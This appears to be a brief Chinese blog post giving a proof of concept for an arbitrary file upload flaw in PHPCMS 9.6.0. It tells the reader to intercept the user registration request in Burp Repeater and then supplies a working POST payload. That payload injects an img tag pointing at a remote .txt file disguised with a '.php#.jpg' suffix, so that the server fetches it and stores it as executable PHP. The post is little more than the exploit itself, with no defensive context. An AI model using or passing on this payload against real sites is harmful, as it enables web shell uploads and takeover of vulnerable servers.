在用户注册处抓包:

最新PHPcms9.6.0 任意文件上传漏洞

然后发送到repeater

最新PHPcms9.6.0 任意文件上传漏洞

POC:

siteid=1&modelid=11&username=z1aaaac121&password=aasaewee311as&email=a1ea2144@qq.com&info[content]=<img src=http://www.tzjrst.com/templets/1.txt?.php#.jpg>&dosubmit=1&protocol=

 

相关文章:

  • 2021-07-28
  • 2022-12-23
  • 2021-06-09
  • 2021-06-26
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-11-16
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案